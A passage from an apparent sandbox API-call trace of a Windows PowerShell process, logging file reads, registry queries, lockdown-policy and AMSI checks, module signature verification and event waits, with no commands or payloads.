hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fc1c8*=0) returned 0x2000 [0232.077] ReadFile (in: hFile=0x694, lpBuffer=0x25846b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fc248, lpOverlapped=0x0 | out: lpBuffer=0x25846b0*, lpNumberOfBytesRead=0x1b7fc248*=0x1000, lpOverlapped=0x0) returned 1 [0232.077] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fc1c8*=0) returned 0x3000 [0232.077] ReadFile (in: hFile=0x694, lpBuffer=0x25846b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fc248, lpOverlapped=0x0 | out: lpBuffer=0x25846b0*, lpNumberOfBytesRead=0x1b7fc248*=0x1000, lpOverlapped=0x0) returned 1 [0232.077] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fc1c8*=0) returned 0x4000 [0232.077] ReadFile (in: hFile=0x694, lpBuffer=0x25846b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fc248, lpOverlapped=0x0 | out: lpBuffer=0x25846b0*, lpNumberOfBytesRead=0x1b7fc248*=0x1000, lpOverlapped=0x0) returned 1 [0232.104] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fc1c8*=0) returned 0x5000 [0232.105] ReadFile (in: hFile=0x694, lpBuffer=0x25846b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fc248, lpOverlapped=0x0 | out: lpBuffer=0x25846b0*, lpNumberOfBytesRead=0x1b7fc248*=0x298, lpOverlapped=0x0) returned 1 [0232.105] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fc1c8*=0) returned 0x5298 [0232.105] ReadFile (in: hFile=0x694, lpBuffer=0x25846b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fc248, lpOverlapped=0x0 | out: lpBuffer=0x25846b0*, lpNumberOfBytesRead=0x1b7fc248*=0x0, lpOverlapped=0x0) returned 1 [0232.105] CoTaskMemAlloc (cb=0x20c) returned 0x1a8f0c10 [0232.105] GetSystemDirectoryW (in: lpBuffer=0x1a8f0c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0232.105] CoTaskMemFree (pv=0x1a8f0c10) [0232.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fbb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0232.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7fbd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0232.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc160) returned 1 [0232.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc240 | out: lpFileInformation=0x1b7fc240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0232.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc120) returned 1 [0232.106] WldpGetLockdownPolicy () returned 0x0 [0232.106] GetSystemInfo (in: lpSystemInfo=0x1b7fc2a0 | out: lpSystemInfo=0x1b7fc2a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0232.106] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fc1a8 | out: phkResult=0x1b7fc1a8*=0x564) returned 0x0 [0232.106] RegQueryValueExW (in: hKey=0x564, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7fc1f8, lpData=0x0, lpcbData=0x1b7fc1f0*=0x0 | out: lpType=0x1b7fc1f8*=0x0, lpData=0x0, lpcbData=0x1b7fc1f0*=0x0) returned 0x2 [0232.106] RegCloseKey (hKey=0x564) returned 0x0 [0232.106] CloseHandle (hObject=0x694) returned 1 [0232.631] CoCreateGuid (in: pguid=0x1b7fc3b8 | out: pguid=0x1b7fc3b8*(Data1=0xe746192e, Data2=0xad61, Data3=0x4fea, Data4=([0]=0xa1, [1]=0x25, [2]=0x7c, [3]=0x53, [4]=0xf4, [5]=0x87, [6]=0xb3, [7]=0x9b))) returned 0x0 [0232.632] GetCurrentProcess () returned 0xffffffffffffffff [0232.632] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fc2d8 | out: TokenHandle=0x1b7fc2d8*=0x694) returned 1 [0232.632] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7fc378 | out: TokenInformation=0x0, ReturnLength=0x1b7fc378) returned 0 [0232.632] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1a646d50 [0232.632] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x8, TokenInformation=0x1a646d50, TokenInformationLength=0x4, ReturnLength=0x1b7fc378 | out: TokenInformation=0x1a646d50, ReturnLength=0x1b7fc378) returned 1 [0232.632] LocalFree (hMem=0x1a646d50) returned 0x0 [0232.632] DuplicateTokenEx (in: hExistingToken=0x694, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1b7fc3d8 | out: phNewToken=0x1b7fc3d8*=0x564) returned 1 [0232.632] CheckTokenMembership (in: TokenHandle=0x564, SidToCheck=0x25c2bf0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1b7fc3e0 | out: IsMember=0x1b7fc3e0) returned 1 [0232.633] CloseHandle (hObject=0x564) returned 1 [0232.635] AmsiScanString () returned 0x80070015 [0232.710] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fba20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fbe60) returned 1 [0232.710] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fbf40 | out: lpFileInformation=0x1b7fbf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0232.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fbe20) returned 1 [0232.710] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fb9d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.710] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fb830, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.711] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fb900, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fbd40) returned 1 [0232.711] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fbe20 | out: lpFileInformation=0x1b7fbe20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0232.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fbd00) returned 1 [0232.711] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fb7f0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fbcd0) returned 1 [0232.711] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x564 [0232.711] GetFileType (hFile=0x564) returned 0x1 [0232.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fbc40) returned 1 [0232.711] GetFileType (hFile=0x564) returned 0x1 [0232.711] WTGetSignatureInfo () returned 0x0 [0232.796] CertDuplicateCertificateContext (pCertContext=0x1a939720) returned 0x1a939720 [0232.796] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fbd68 | out: phkResult=0x1b7fbd68*=0x6f4) returned 0x0 [0232.797] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fbdb8, lpData=0x0, lpcbData=0x1b7fbdb0*=0x0 | out: lpType=0x1b7fbdb8*=0x1, lpData=0x0, lpcbData=0x1b7fbdb0*=0x56) returned 0x0 [0232.797] RegQueryValueExW (in: hKey=0x6f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fbdb8, lpData=0x25e7fc8, lpcbData=0x1b7fbdb0*=0x56 | out: lpType=0x1b7fbdb8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fbdb0*=0x56) returned 0x0 [0232.797] RegCloseKey (hKey=0x6f4) returned 0x0 [0232.797] CoTaskMemAlloc (cb=0x10) returned 0x1a9046a0 [0232.797] CoTaskMemAlloc (cb=0x50) returned 0x1a9af3a0 [0232.797] WinVerifyTrust () returned 0x0 [0232.798] CoTaskMemFree (pv=0x1a9af3a0) [0232.798] CoTaskMemFree (pv=0x1a9046a0) [0232.798] CertFreeCertificateContext (pCertContext=0x1a939720) returned 1 [0232.798] CloseHandle (hObject=0x564) returned 1 [0232.798] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0x70d31968, Data2=0x3213, Data3=0x441f, Data4=([0]=0xaa, [1]=0x4c, [2]=0x3b, [3]=0x7d, [4]=0x7, [5]=0x3, [6]=0x8d, [7]=0xc1))) returned 0x0 [0233.174] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0xe51625ca, Data2=0xbe78, Data3=0x4003, Data4=([0]=0x9e, [1]=0x71, [2]=0xf1, [3]=0x14, [4]=0x8b, [5]=0x3c, [6]=0xd5, [7]=0x1a))) returned 0x0 [0233.174] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0x592b8645, Data2=0xf874, Data3=0x41d2, Data4=([0]=0xbe, [1]=0x4e, [2]=0x89, [3]=0xc1, [4]=0xc, [5]=0xdd, [6]=0xa9, [7]=0xfe))) returned 0x0 [0233.471] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a965600 [0233.473] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a9653e0 [0233.709] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0x5a4044e4, Data2=0xc231, Data3=0x4910, Data4=([0]=0xa1, [1]=0x57, [2]=0xd2, [3]=0x5b, [4]=0xbb, [5]=0x6f, [6]=0x47, [7]=0x54))) returned 0x0 [0233.883] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0x44c712c2, Data2=0x77cb, Data3=0x4923, Data4=([0]=0x93, [1]=0xa3, [2]=0x24, [3]=0x42, [4]=0xab, [5]=0x3c, [6]=0x19, [7]=0xf6))) returned 0x0 [0234.114] RtlTryEnterCriticalSection (CriticalSection=0x54fde8) returned 1 [0234.117] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0x86fe4885, Data2=0xebcf, Data3=0x450d, Data4=([0]=0x85, [1]=0x72, [2]=0x7a, [3]=0x71, [4]=0xf7, [5]=0x5c, [6]=0xb, [7]=0x52))) returned 0x0 [0234.117] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0x8399c18d, Data2=0x43f7, Data3=0x4607, Data4=([0]=0xb9, [1]=0x17, [2]=0x9d, [3]=0x68, [4]=0x84, [5]=0x20, [6]=0xa7, [7]=0x92))) returned 0x0 [0234.117] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0x21ff1716, Data2=0xc271, Data3=0x44c2, Data4=([0]=0x96, [1]=0xba, [2]=0x77, [3]=0xec, [4]=0xe, [5]=0x21, [6]=0xec, [7]=0x3a))) returned 0x0 [0234.149] CoCreateGuid (in: pguid=0x1b7fbd38 | out: pguid=0x1b7fbd38*(Data1=0x6bd928a9, Data2=0x6f06, Data3=0x4af4, Data4=([0]=0xb2, [1]=0xeb, [2]=0x30, [3]=0xd3, [4]=0xe5, [5]=0xc1, [6]=0x69, [7]=0x9))) returned 0x0 [0234.350] CoTaskMemAlloc (cb=0x20e) returned 0x1a8f18d0 [0234.350] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a8f18d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0234.351] CoTaskMemFree (pv=0x1a8f18d0) [0234.361] EtwEventActivityIdControl () returned 0x0 [0234.361] EtwEventActivityIdControl () returned 0x0 [0234.361] EtwEventActivityIdControl () returned 0x0 [0234.415] EtwEventActivityIdControl () returned 0x0 [0234.417] CoTaskMemAlloc (cb=0x20e) returned 0x1a8ec1b0 [0234.417] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a8ec1b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0234.417] CoTaskMemFree (pv=0x1a8ec1b0) [0234.417] EtwEventActivityIdControl () returned 0x0 [0234.417] EtwEventActivityIdControl () returned 0x0 [0234.417] EtwEventActivityIdControl () returned 0x0 [0234.419] EtwEventActivityIdControl () returned 0x0 [0234.419] CoTaskMemAlloc (cb=0x20e) returned 0x1a8eee50 [0234.419] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a8eee50, nSize=0x105 | out: lpBuffer="") returned 0x0 [0234.419] CoTaskMemFree (pv=0x1a8eee50) [0234.419] EtwEventActivityIdControl () returned 0x0 [0234.419] EtwEventActivityIdControl () returned 0x0 [0234.419] EtwEventActivityIdControl () returned 0x0 [0234.419] EtwEventActivityIdControl () returned 0x0 [0234.420] CoTaskMemAlloc (cb=0x20e) returned 0x1a8ec3d0 [0234.420] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a8ec3d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0234.420] CoTaskMemFree (pv=0x1a8ec3d0) [0234.420] EtwEventActivityIdControl () returned 0x0 [0234.420] EtwEventActivityIdControl () returned 0x0 [0234.420] EtwEventActivityIdControl () returned 0x0 [0234.458] EtwEventActivityIdControl () returned 0x0 [0234.458] CoTaskMemAlloc (cb=0x20e) returned 0x1a8f16b0 [0234.458] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a8f16b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0234.458] CoTaskMemFree (pv=0x1a8f16b0) [0234.458] EtwEventActivityIdControl () returned 0x0 [0234.458] EtwEventActivityIdControl () returned 0x0 [0234.458] EtwEventActivityIdControl () returned 0x0 [0234.459] EtwEventActivityIdControl () returned 0x0 [0234.459] CoTaskMemAlloc (cb=0x20e) returned 0x1a8efb10 [0234.459] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a8efb10, nSize=0x105 | out: lpBuffer="") returned 0x0 [0234.459] CoTaskMemFree (pv=0x1a8efb10) [0234.459] EtwEventActivityIdControl () returned 0x0 [0234.459] EtwEventActivityIdControl () returned 0x0 [0234.459] EtwEventActivityIdControl () returned 0x0 [0234.459] EtwEventActivityIdControl () returned 0x0 [0234.615] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fe0c8 | out: phkResult=0x1b7fe0c8*=0x694) returned 0x0 [0234.616] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x0, lpcbData=0x1b7fe110*=0x0 | out: lpType=0x1b7fe118*=0x1, lpData=0x0, lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.616] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x27c03a0, lpcbData=0x1b7fe110*=0x56 | out: lpType=0x1b7fe118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.616] RegCloseKey (hKey=0x694) returned 0x0 [0234.616] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fe0c8 | out: phkResult=0x1b7fe0c8*=0x694) returned 0x0 [0234.616] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x0, lpcbData=0x1b7fe110*=0x0 | out: lpType=0x1b7fe118*=0x1, lpData=0x0, lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.616] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x27c0748, lpcbData=0x1b7fe110*=0x56 | out: lpType=0x1b7fe118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.617] RegCloseKey (hKey=0x694) returned 0x0 [0234.617] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fe0c8 | out: phkResult=0x1b7fe0c8*=0x694) returned 0x0 [0234.617] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x0, lpcbData=0x1b7fe110*=0x0 | out: lpType=0x1b7fe118*=0x1, lpData=0x0, lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.617] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x27c0ac8, lpcbData=0x1b7fe110*=0x56 | out: lpType=0x1b7fe118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.617] RegCloseKey (hKey=0x694) returned 0x0 [0234.617] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fe0c8 | out: phkResult=0x1b7fe0c8*=0x694) returned 0x0 [0234.617] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x0, lpcbData=0x1b7fe110*=0x0 | out: lpType=0x1b7fe118*=0x1, lpData=0x0, lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.617] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x27c0e60, lpcbData=0x1b7fe110*=0x56 | out: lpType=0x1b7fe118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.617] RegCloseKey (hKey=0x694) returned 0x0 [0234.618] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fe0c8 | out: phkResult=0x1b7fe0c8*=0x694) returned 0x0 [0234.618] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x0, lpcbData=0x1b7fe110*=0x0 | out: lpType=0x1b7fe118*=0x1, lpData=0x0, lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.618] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x27c1208, lpcbData=0x1b7fe110*=0x56 | out: lpType=0x1b7fe118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.618] RegCloseKey (hKey=0x694) returned 0x0 [0234.618] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fe0c8 | out: phkResult=0x1b7fe0c8*=0x694) returned 0x0 [0234.618] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x0, lpcbData=0x1b7fe110*=0x0 | out: lpType=0x1b7fe118*=0x1, lpData=0x0, lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.618] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x27c15b0, lpcbData=0x1b7fe110*=0x56 | out: lpType=0x1b7fe118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.618] RegCloseKey (hKey=0x694) returned 0x0 [0234.618] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fe0c8 | out: phkResult=0x1b7fe0c8*=0x694) returned 0x0 [0234.619] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x0, lpcbData=0x1b7fe110*=0x0 | out: lpType=0x1b7fe118*=0x1, lpData=0x0, lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.619] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe118, lpData=0x27c1930, lpcbData=0x1b7fe110*=0x56 | out: lpType=0x1b7fe118*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fe110*=0x56) returned 0x0 [0234.619] RegCloseKey (hKey=0x694) returned 0x0 [0234.619] EtwEventActivityIdControl () returned 0x0 [0234.619] EtwEventActivityIdControl () returned 0x0 [0234.620] SetEvent (hEvent=0x6c0) returned 1 [0234.620] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7fe4e0*=0x6c0, lpdwindex=0x1b7fe2b4 | out: lpdwindex=0x1b7fe2b4) returned 0x0 [0234.624] CoTaskMemAlloc (cb=0x20e) returned 0x1a8ed910 [0234.624] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1a8ed910, nSize=0x105 | out: lpBuffer="") returned 0x0 [0234.624] CoTaskMemFree (pv=0x1a8ed910) [0234.627] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0234.627] GetFileType (hFile=0x28) returned 0x2 [0234.628] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x1b7fe818 | out: lpConsoleScreenBufferInfo=0x1b7fe818) returned 1 [0234.673] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0x1b7fe818 | out: lpConsoleScreenBufferInfo=0x1b7fe818) returned 1 [0234.826] EtwEventActivityIdControl () returned 0x0 [0234.826] EtwEventActivityIdControl () returned 0x0 [0234.826] EtwEventActivityIdControl () returned 0x0 [0234.871] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x694 [0234.872] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x1388, cHandles=0x1, pHandles=0x1b7fe940*=0x694, lpdwindex=0x1b7fe714 | out: lpdwindex=0x1b7fe714) returned 0x80010115 [0239.878] EtwEventActivityIdControl () returned 0x0 [0239.888] CloseHandle (hObject=0x694) returned 1 [0239.889] EtwEventActivityIdControl () returned 0x0 [0239.889] EtwEventActivityIdControl () returned 0x0 [0239.889] EtwEventActivityIdControl () returned 0x0 [0239.889] EtwEventActivityIdControl () returned 0x0 [0239.890] SetEvent (hEvent=0x568) returned 1 [0239.890] SetEvent (hEvent=0x590) returned 1 [0239.890] SetEvent (hEvent=0x58c) returned 1 [0239.890] SetEvent (hEvent=0x570) returned 1 [0239.890] SetEvent (hEvent=0x598) returned 1 [0239.890] SetEvent (hEvent=0x594) returned 1 [0239.890] SetEvent (hEvent=0x57c) returned 1 [0239.890] SetEvent (hEvent=0x578) returned 1 [0239.890] SetEvent (hEvent=0x584) returned 1 [0239.896] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7ff250*=0x574, lpdwindex=0x1b7ff024 | out: lpdwindex=0x1b7ff024) returned 0x0 [0239.896] SetThreadUILanguage 